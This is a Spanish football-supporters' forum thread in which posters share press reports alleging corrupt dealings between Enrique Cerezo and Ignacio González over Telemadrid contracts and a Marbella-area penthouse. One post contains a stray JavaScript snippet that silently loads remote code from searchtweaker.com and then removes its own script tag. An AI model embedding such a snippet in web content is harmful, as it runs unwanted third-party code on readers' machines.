en

Cerezo y González...Las amistades peligrosas.

Último artículo 15-07-2020 0:48 escrito por berik. 113 respuestas.
Página 1 de 8 (114 elementos) 1 2 3 4 5 Siguiente > ... Último »
Ordenar mensajes: Anterior Siguiente
  • 22-06-2012 22:55

    Cerezo y González...Las amistades peligrosas.

    Por su interés, copio y pego información referida a estos personajes de la web de salvemostelemadrid.es

    http://www.salvemostelemadrid.es/images/stories/pdfs/2012LaParabolica/laparabolica210.pdf

    Telemadrid y Caja Madrid adquirieron en 2007 por 300 millones de euros (230 para el Atlético) los derechos de transmisión del Atlético de Madrid y el Getafe para las temporadas 2009-2013, para lo que crearon la sociedad Madrid Deporte Audiovisual, S.A. La operación fue aprobada por el Consejo de Administración de Caja Madrid, con el voto en contra de los consejeros del PSOE, UGT y CCOO, que lo consideraron una inversión "ruinosa". La empresa Multipark Madrid gestiona desde el 1 de abril de 2008, fecha en la que cambia su objeto social, la comercialización de la publicidad de Telemadrid. Multipark está formada por Caja Madrid (30%) Telemadrid (35%) y Boomerang TV (propiedad de Enrique Cerezo, con otro 35%). Telemadrid ha aportado a ese conglomerado al menos seis millones de euros.

    Sin embargo, los ingresos de publicidad declarados por Multipark son bastante inferiores a los de televisiones de otras autonomías con una cuota de mercado similar o inferior a la nuestra: desde que Multipark gestiona nuestra publicidad, los ingresos se han reducido a la mitad, aportando en el ejercicio de 2011 tan solo 16 millones de euros (en el mismo periodo TV3 ingresó 85 millones de euros por el mismo concepto). Desde que gobierna Esperanza Aguirre Enrique Cerezo también ha ingresado de las arcas de Telemadrid, en concepto de derechos cinematográficos, al menos 1.141.900 €, según las cuentas que ofreció en la Asamblea de Madrid el propio Director General. Según informó El Confidencial Digital (22/4/2009), nuestro viejo conocido (y entonces director de RTVE) Jorge Sanchez Gallo (antes de que le relevara en el puesto Ángel Martín Vizcaíno, actual subdirector de Telemadrid) dos contratos con los productores Enrique Cerezo y  , por un paquete de películas valoradas entonces en 3.000 millones de pesetas . Según publicó El País (18/2/97) "Altos cargos de TVE señalan que la compra de casi 700 películas a Enrique Cerezopor mas de   3.000 millones de pesetas "ha causado indignación  en el sector del cine ya que "no se cumplieron normas internas" en su contratación y que el precio es exageradamente alto dada la calidad de las cintas”.

     Tanto Cerezo como Frade lograron que Ignacio González les adjudicara 13 licencias de TDT en la Comunidad. El Director General de Telemadrid, José Antonio Sánchez, justificó esas compras en sede parlamentaria explicando que la empresa distribuidora de Cerezo, Video Mercury Films (radicada en Pozuelo) poseía los derechos del 80% del cine español. Sin embargo, y a pesar de que fuentes de la propia compañía reducen esa cifra al 70%, la realidad es bastante distinta: el catálogo de Video Mercury está compuesto por 6.000 películas: de ellas, 2.000 son italianas; 1.254 pertenecen al viejo archivo de la RKO (que cesó su producción en 1957) y otras 1.000 son producciones norteamericanas de bajo presupuesto. Si hacemos la resta quedarían apenas 1.500 películas españolas, la mayoría subproductos como las colecciones de Marisol, Joselito, Lola Flores y Carmen Sevilla. Esas cifras no constituyen ni de lejos “el 80% del cine español”, siendo utilizadas en su mayoría para nutrir el programa de cine de José Luis Garci, socio de Cerezo y uno de los mayores supporters del Atlético de Madrid.

    Precisamente el film Sangre de Mayo, dirigido por Garci y que tiene el dudoso honor de ser una de las tres películas más caras del cine español, fue encargado por Esperanza Aguirre, para conmemorar el bicentenario del Dos de Mayo. La totalidad del presupuesto, quince millones de €, fue aportada en su integridad por Telemadrid. Sin embargo, en los créditos de la película figura en primer lugar como una producción de Nickel Odeon Dos S.A., empresa asociada a Enrique Cerezo Producciones Cinematográficas en al menos cinco producciones televisivas o cinematográficas anteriores. Expertos del sector aseguran que el disparatado coste de la cinta no se ve reflejado en el aspecto de la producción. Pero las conexiones entre Cerezo y González no acaban ahí: "Enrique Cerezo e Ignacio González son las dos caras de una misma moneda. Uno tenía el producto y el otro, la oferta. Como ya publicó Estrella Digital el pasado 29 de marzo, la Comunidad de Madrid, a través de la empresa pública Promomadrid, alcanzó un acuerdo con EGEDA Producciones, empresa presidida por Cerezo, y con CEIM (Confederación Empresarial de Madrid- CEOE, cuya adjunta a la presidencia es Lourdes Cavero, mujer de Ignacio González) para la colaboración entre el sector audiovisual madrileño y el de EEUU". (EGEDA fue multada en marzo por medio millón de euros por abuso de tarifas de derechos).

    Además, “la Comisaría General de Policía Judicial (CGPJ) ve indicios de blanqueo de capitales en la compra del ático de 495 metros cuadrados en la urbanización marbellí de Guadalmina del que disfruta el vicepresidente de Madrid, Ignacio González. El dúplex, situado un piso por encima del de Carmen Franco Polo, se vendió, según aseguró a este periódico la comercial de la urbanización, en 1,1 millones de euros. En las notas elaboradas por los agentes se apuntaba que el piso procede, presumiblemente, del pago de una comisión por la venta a bajo precio a Martinsa de unos terrenos municipales en el municipio madrileño popular de Arganda del Rey (se enajenaron por 70 millones de euros cuando una tasación municipal fijó el precio justo en 100 millones). El Banco de España no conoce la cantidad invertida por la sociedad Coast Investors, que controla el testaferro profesional californiano Rudy Valner (tesorero de Enrique Cerezo en su oficina de Los Ángeles), y que los agentes que han rastreado la operación cuantifican en «más de un millón de euros».

    El sindicato mayoritario de la Policía señala que de la operación «se desprende que pudieran haberse producido hechos delictivos, tanto por el origen del dinero como por la clara ocultación de la verdadera identidad del auténtico propietario, así como por la ocultación total ante los organismos que deben regular el movimiento de capitales en el territorio nacional» (El Mundo, 19 y 20/6/12). Hay que recordar que Cerezo, que fue condenado junto a Jesús Gil y su hijo por un delito de apropiación indebida, también ha conseguido de la administración popular para el equipo que preside la compra de los terrenos del Calderón, la cesión del estadio público de La Peineta y la Ciudad Deportiva del Atlético, colindante a los terrenos ofrecidos para EuroVegas.

  • 23-06-2012 19:11 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

    Habrá que profundizar en esto que cuenta lovecraf...igual es tiempo de plaquetas...y de empujar. Que hable A.
    "El Atlético no se merece que le estén tratando como le están tratando. No se puede conformar con entrar en Europa, estoy en contra de anuncios como ese de 'Papá, ¿por qué somos del Atleti?'. ¡No! Cuando yo estaba siempre salíamos a competir a por la Liga, la Copa, todo. ¡Vuestros padres no nos permitían otra cosa! Somos el tercer equipo de España, pero nos hemos alejado de nuestra historia. Pero pensad que, cuando una puerta se cierra, se abre una ventana".
    Luis Aragonés en su Gaudeamus

    Diles que se vayan
    https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/404125_10151097005874053_1474836781_n.jpg
  • 23-06-2012 21:31 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

    Los negocios entre empresarios corrupptos y políticos sin escrúppulos..., o al revés, ja ja, entre empresarios sin escrúppulos y políticos corrupptos, se producen a diario en toda esppaña: eso no debería preocuparnos mucho, como mucho inquietarnos; indignarnos mucho no, porque eso nos podría arruinar la vida, sobre todo si nos da por manifestarnos.

    A mi lo que me jode, hablando en plata, es que esté de por medio mi atleti, porque yo ya era del atleti mucho antes de que estos cerdos esppecularan con mi amor a unos colores, por mi religión atlética, la única que me permite mi ateismo.

    Por tanto, preocupado, inquieto, indignado privado y atlético hasta la muerte, joderrrr.

    El mayor exito de la educación es la tolerancia

  • 25-06-2012 22:50 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

    Es verdad que el tema tiene un tufo nauseabundo, y pudiera tocar al atleti y, por lo tanto, perseguirlo a ASdH. Pero como dice JK para este empujón harían falta plaquetas extras y veo al foro relajado. Pero......y hasta aquí puedo leer.
  • 26-06-2012 13:33 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

     http://www.elplural.com/2012/06/25/asi-son-los-turbios-negocios-de-telemadrid-con-el-productor-enrique-cerezo/

     

    La cadena pública, en pleno proceso de desmantelamiento, ha entregado a las empresas del presidente del Atlético más dinero que el equivalente a su deuda
    Así son los turbios negocios de Telemadrid con el productor Enrique Cerezo

     

    La mente humana tiende a creer que los problemas pueden solucionarse con reuniones u otros conjuros institucionales, sin necesidad de cambiar el contexto que los genera (JOSÉ MANUEL NAREDO)

    Ahora sabemos que nada bueno vendrá, si no lo traemos nosotros. (P.GUERRA)
  • 26-06-2012 17:35 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

    marianux:

     http://www.elplural.com/2012/06/25/asi-son-los-turbios-negocios-de-telemadrid-con-el-productor-enrique-cerezo/

    La cadena pública, en pleno proceso de desmantelamiento, ha entregado a las empresas del presidente del Atlético más dinero que el equivalente a su deuda
    Así son los turbios negocios de Telemadrid con el productor Enrique Cerezo

    Lo estaba leyendo y ..., ejem..., lo iba a colgar, pero te has adelantado, ja ja.

    El mayor exito de la educación es la tolerancia

  • 25-05-2013 13:59 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas


    La juez investiga la relación entre Enrique Cerezo y el vendedor del ático de Ignacio González

    La juez interrogó ayer al abogado Antonio Yáñez, exletrado del bufete que representa al presidente del Atlético de Madrid y que también participó en la venta del ático

    Rudy Valner, antiguo casero del ático de Ignacio González, fue tesorero de Egeda U.S., una filial estadounidense de Egeda, la entidad de gestión de derechos de los productores audiovisuales, que también preside Enrique Cerezo

    Yáñez dice desconocer por qué la empresa que vendió el ático a Ignacio González tenía sede en su casa de Madrid

    Valner estaba citado a declarar, pero no apareció

    Enrique Cerezo (EGEDA) acusa al Gobierno de no hacer nada contra la piratería

    Enrique Cerezo, presidente de Egeda y del Atlético de Madrid. EFE.

    Los últimos movimientos de la titular del Juzgado de Instrucción 5 de Estepona, Mariana Peregrina, instructora del llamado 'caso ático', en relación con el inmueble que posee el presidente de la Comunidad de Madrid, Ignacio González, en la localidad malagueña se centran en conocer las vinculaciones societarias entre el antiguo casero del político del PP, Rudy Valner, y el presidente del Club Atlético de Madrid, Enrique Cerezo. A medida que avanzan las pesquisas judiciales queda más patente la vinculación del dirigente futbolístico con Valner, considerado como un testaferro profesional que ofrece servicios fiduciarios en su página web norteamericana.

    Este viernes Valner, de nacionalidad mexicana y afincado en Los Angeles (EEUU), estaba citado a declarar como testigo en Estepona. No apareció. Su localización no ha sido posible debido a que faltaban datos sobre el domicilio social que el testigo había designado en Madrid, a través de la sociedad radicada en Delaware (EEUU) Coast Investors, antigua propietaria del inmueble vendido a Ignacio González y su esposa, Lourdes Cavero, en diciembre de 2012 por importe de 770.000 euros.

    Quien sí ha comparecido como testigo es el abogado Luis Yáñez-Barnuevo Hermosín, hijo del conocido eurodiputado del PSOE Luis Yáñez y de la exconsejera de la Junta de Andalucía Carmen Hermosín. Dicho letrado trabajó desde 2008 hasta 2011 para el bufete madrileño Suárez de la Dehesa. De hecho, ha reconocido haber tramitado en 2008 el Número de Identificación Fiscal (NIE) para regular la situación de Coast Investors en España. Fue en ese año cuando la sociedad off shore radicada en el Estado norteamericano de Delaware (considerado como paraíso fiscal por su régimen especial tributario) compró el ático que poco después comenzó a arrendar al matrimonio González-Cavero.

    En la declaración de Yáñez, a la que ha tenido acceso eldiario.es, este ha reconocido que la entidad de gestión de derechos Egeda, presidida por Cerezo, "era el principal cliente del bufete Suárez de la Dehesa" cuando él trabajó en la citada firma de abogados, entre 2008, cuando Coast Investors adquirió el ático de Estepona, y 2011. De hecho, Yáñez define a Egeda como "la entidad de gestión de los productores audiovisuales".

    El testigo desconoce si Valner ha sido "tesorero" de Egeda, pero "sí le consta" que Cerezo "es el presidente" de la citada entidad. Al hilo de tales afirmaciones cabe destacar que Egeda España tiene una filial en Estados Unidos, denominada Egeda U.S. Inc., presidida también por Cerezo, en la que Valner figuró como tesorero hasta que en 2011 saltó a los medios de comunicación que la Policía investigaba el uso y disfrute del ático de Estepona por parte del entonces número 2 de Esperanza Aguirre.

    No menos relevante resulta el hecho de que González siempre negó a partir de 2011 haber conocido personalmente a Rudy Valner cuando comenzó a disfrutar del inmueble en régimen de alquiler en 2008. Sin embargo, informaciones publicadas en diversos medios de comunicación sitúan entre octubre y noviembre de 2007 al entonces vicepresidente de la Comunidad de Madrid en Los Angeles como participante en un evento de Egeda U.S. Inc. en el que también estuvo presente Enrique Cerezo. En dicho encuentro participó también el conocido productor Pedro Pérez, expresidente de Vía Digital y responsable de FAPAE, así como una delegación de la CEIM (la patronal de empresarios de Madrid) a cuyo organigrama directivo pertenece la esposa de González, Lourdes Cavero.

    Llama poderosamente la atención que el testigo Antonio Yáñez desconoce por qué Coast Investors tenía su domicilio social en Madrid precisamente en la vivienda que él mismo ocupaba en 2008. Asegura no haber conocido personalmente a Rudy Valner, y niega haber intervenido ni en la compra ni en el alquiler del famoso ático. Tampoco es baladí que el testigo haya reconocido que "no era normal dar de alta empresas radicadas fuera de España en ese despacho de abogados que, de hecho, [Coast Investors] es la única que recuerda". Y es que el bufete Suárez de la Dehesa está especializado en la tramitación de todo tipo de asuntos relacionados con el mundo audiovisual y los derechos de autor, al contar entre su clientela con la Sociedad General de Autores (SGAE) y especialmente con la entidad de gestión de derechos presidida por Cerezo (Egeda) como "cliente principal", ha descrito Yáñez.

    Todo indica que el fiscal jefe de Málaga, Juan Carlos López Caballero, presente este viernes en la declaración testifical de Yáñez, en nombre de Anticorrupción, podría solicitar las declaraciones como nuevos testigos de quienes fueron los jefes directos del declarante, hacia quienes ha desviado en todo momento las responsabilidades en cuanto a que recibía instrucciones y directrices de ellos en el marco de la relación con Coast Investors. Se trata de José Antonio Suárez Lozano y Fernando Suárez Lozano.

    Desde una cuenta bancaria extranjera de Coast Investors, una empresa sin ninguna actividad comercial ni empresarial conocida, salieron en 2008 más de 650.000 euros destinados al pago de la compra del ático, que fueron a parar al entonces promotor y propietario, el empresario asturiano Javier Pérez Villate. De hecho, el objeto de la comisión rogatoria que la juez Mariana Peregrina encargó meses atrás se centra en determinar quién hizo el ingreso de dicha cantidad en una entidad bancaria londinense, antes de que los fondos salieran con destino a España para llegar al vendedor del inmueble que ahora disfruta González como último propietario y antiguo inquilino.

    El Sindicato Unificado de Policía (SUP), cuyo secretario general, José María Sánchez Fornet, ha estado este viernes en Estepona, ya sospechó que el polémico dúplex de Estepona "siempre ha sido propiedad" de Ignacio González, de ahí que denunciara presuntos delitos de blanqueo de capitales y contra la Hacienda Pública. No obstante, por el momento las pesquisas judiciales se centran exclusivamente en determinar si Coast Investors y su representante, Rudy Valner, pudieron incurrir en delito fiscal.

    Javier Carnerero, letrado que representa al SUP, personado como acción popular en la causa, ha asegurado a eldiario.es que "lo más llamativo ha sido la presencia hoy de un abogado en nombre de la sociedad Coast Investors, cuando no existe ninguna persona de esa empresa imputada". El abogado del sindicato policial ha añadido que el letrado que representa a la sociedad de la que es representante Rudy Valner "ha pedido el sobreseimiento de las actuaciones", en referencia a la insistencia mostrada en nombre del considerado testaferro profesional para que el caso se archive por completo.







     http://www.eldiario.es/politica/Cerezo-testaferro-Rudy-Valner-Gonzalez_0_135787119.html

    (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
    Diles que se vayan
  • 26-05-2013 1:03 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

    Curioso que echen hoy y mañana en RTVE esa superproduccion de Cerezo DESDE QUE AMANECE APETECE
  • 17-06-2013 13:12 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

     Hoy en El Mundo:



  • 17-06-2013 20:09 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

     

    El SUP cree que el sospechoso ático marbellí de González pudo ser un soborno de Cerezo al presidente madrileño
    Es uno de los empresarios más beneficiados por la Comunidad de Madrid, que le adjudicó la publicidad de Telemadrid y le compró por 230 millones los derechos de emisión del Atletico
    0

    El presidente del Atlético de Madrid y productor Enrique Cerezo

    El presidente del Atlético de Madrid y productor Enrique Cerezo

    El testaferro estadounidense que controlaba el ático de Ignacio González en Marbella, Rudy Valner, fue tesorero de la empresa Egeda US, presidida por Enrique Cerezo, y actualmente es el abogado en Estados Unidos del productor y presidente del Atlético de Madrid. Se da la circunstancia de que Cerezo es uno de los empresarios más beneficiados por la Comunidad de Madrid, que le adjudicó la publicidad de Telemadrid, La Otra y la página web de la cadena pública; le compró por 230 millones los derechos de emisión de su equipo de fútbol, entre otros beneficios.

    Los sindicatos creen que se trató del pago de una comisión
    El Mundo publica este lunes que el Sindicato Unificado de Policía y los sindicatos representados en Telemadrid consideran que el ático del presidente madrileño puso ser un soborno de Enrique Cerezo a González, cuando éste ocupaba la vicepresidencia de la Comunidad de Madrid.

    Las versiones dadas por González
    El lujoso ático, de 495 metros cuadrados, con piscina privada, sauna, jacuzzi, cinco habitaciones y tres plazas de garaje, ha estado rodeado de múltiples incógnitas. El testaferro Rudy Valner es la persona que compró el inmueble en 2008 y supuestamente lo alquilaba a González por 2.000 euros al mes. Esto último fue lo que declaró el presidente madrileño ante los medios de comunicación en marzo de 2012, después de que se filtrara la existencia de esta propiedad. Pero el sucesor de Aguirre terminó confirmando en enero de 2013 que había comprado el ático finalmente. Según dijo, cerró la operación en diciembre pasado.

    Un imputado en Gürtel también apuntó al pago de una comisión
    En un principio, las investigaciones apuntaban a que el ático habría sido el pago de una comisión a González por parte del empresario Fernando Martín como contraprestación por haberle favorecido en la compra de unas parcelas a bajo precio en la localidad madrileña de Arganda. Eso fue, al menos, lo que declaró un imputado en el caso Gürtel. Esta es la primera vez que aparece el nombre de Enrique Cerezo relacionado al inmueble.

    El despacho que asesoró en la compra trabaja exclusivamente para Cerezo
    Según asegura El Mundo, Rudy Valner realizó la compra del ático a través de su empresa Coast Investors, asesorado por el despacho de abogados Suárez de la Dehesa, situado en el madrileño Paseo de Rosales, y que trabaja casi en exclusiva para Cerezo. Además, se da la circunstancia de que Coast Investors está radicada en España en el número 40 del Paseo de Rosales.

    El empresario ha admitido que Rudy Valner es “íntimo amigo” suyo, que fue tesorero de su empresa y es desde “hace dos años” su abogado en Estados Unidos. Pero no recuerda si fue él quien presentó a Valner y a González.


    http://www.elplural.com/2013/06/17/el-sup-cree-que-el-sospechoso-atico-marbelli-de-gonzalez-pudo-ser-un-soborno-de-cerezo-al-presidente-madrileno/

    Diles que se vayan
  • 17-06-2013 20:26 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

     Todo esto ya se sabe desde hace mucho, resulta extraño que Inda lo saque ahora, debe haber algún motivo.

    "El Atlético no se merece que le estén tratando como le están tratando. No se puede conformar con entrar en Europa, estoy en contra de anuncios como ese de 'Papá, ¿por qué somos del Atleti?'. ¡No! Cuando yo estaba siempre salíamos a competir a por la Liga, la Copa, todo. ¡Vuestros padres no nos permitían otra cosa! Somos el tercer equipo de España, pero nos hemos alejado de nuestra historia. Pero pensad que, cuando una puerta se cierra, se abre una ventana".
    Luis Aragonés en su Gaudeamus

    Diles que se vayan
    https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/404125_10151097005874053_1474836781_n.jpg
  • 17-06-2013 20:33 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

    JESUSEZ:

     Todo esto ya se sabe desde hace mucho, resulta extraño que Inda lo saque ahora, debe haber algún motivo.

    Político, sin duda alguna, en mi opinión. Pesa más que lo deportivo o cualquier otro en estos momentos. Pero tampoco creo que sirva para mucho, no es más que otra noticia de esas que ya se pueden dar por sabidas, pero una vez que se vuelven a ver escritas, cumplen el objetivo previsto. Y que conste que me trae sin cuidado el tal señor González en esta película, si es golfo o es honrado. Del único que tengo constancia de que está más cerca de lo primero que de lo segundo (según sentencias judiciales firmes) es del otro.

    ¡¡¡Aúpa Atleti!!!
  • 17-06-2013 20:35 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

    Aristes:
    JESUSEZ:

     Todo esto ya se sabe desde hace mucho, resulta extraño que Inda lo saque ahora, debe haber algún motivo.

    Político, sin duda alguna, en mi opinión. Pesa más que lo deportivo o cualquier otro en estos momentos. Pero tampoco creo que sirva para mucho, no es más que otra noticia de esas que ya se pueden dar por sabidas, pero una vez que se vuelven a ver escritas, cumplen el objetivo previsto. Y que conste que me trae sin cuidado el tal señor González en esta película, si es golfo o es honrado. Del único que tengo constancia de que está más cerca de lo primero que de lo segundo (según sentencias judiciales firmes) es del otro.

    lo veo más como un aviso...el de todos los años por estas fechas...
    "El Atlético no se merece que le estén tratando como le están tratando. No se puede conformar con entrar en Europa, estoy en contra de anuncios como ese de 'Papá, ¿por qué somos del Atleti?'. ¡No! Cuando yo estaba siempre salíamos a competir a por la Liga, la Copa, todo. ¡Vuestros padres no nos permitían otra cosa! Somos el tercer equipo de España, pero nos hemos alejado de nuestra historia. Pero pensad que, cuando una puerta se cierra, se abre una ventana".
    Luis Aragonés en su Gaudeamus

    Diles que se vayan
    https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/404125_10151097005874053_1474836781_n.jpg
  • 17-06-2013 20:39 en respuesta a

    Re: Cerezo y González, Las amistades peligrosas

    En este país pegas una patada a una piedra y salen diez golfos, por eso desgraciadamente este tipo de noticias ya ni llaman la atención.

Página 1 de 8 (114 elementos) 1 2 3 4 5 Siguiente > ... Último »

AVISO LEGAL - Esta web pertenece a la ASDH, sin relación directa alguna con la sociedad Club Atlético de Madrid SAD. El uso de cualquier marca propiedad de la última se hace de modo nominativo y en ningún caso con fines comerciales o de intento de confusión de marcas. Así mismo SDH no se responsabiliza de las opiniones de sus colaboradores, foristas, etc...

Ofrecido por Community Server (Non-Commercial Edition) Football Supporters International Federación de Accionistas y Socios del Fútbol Español Asóciate al Atlético Club de Socios a través de Señales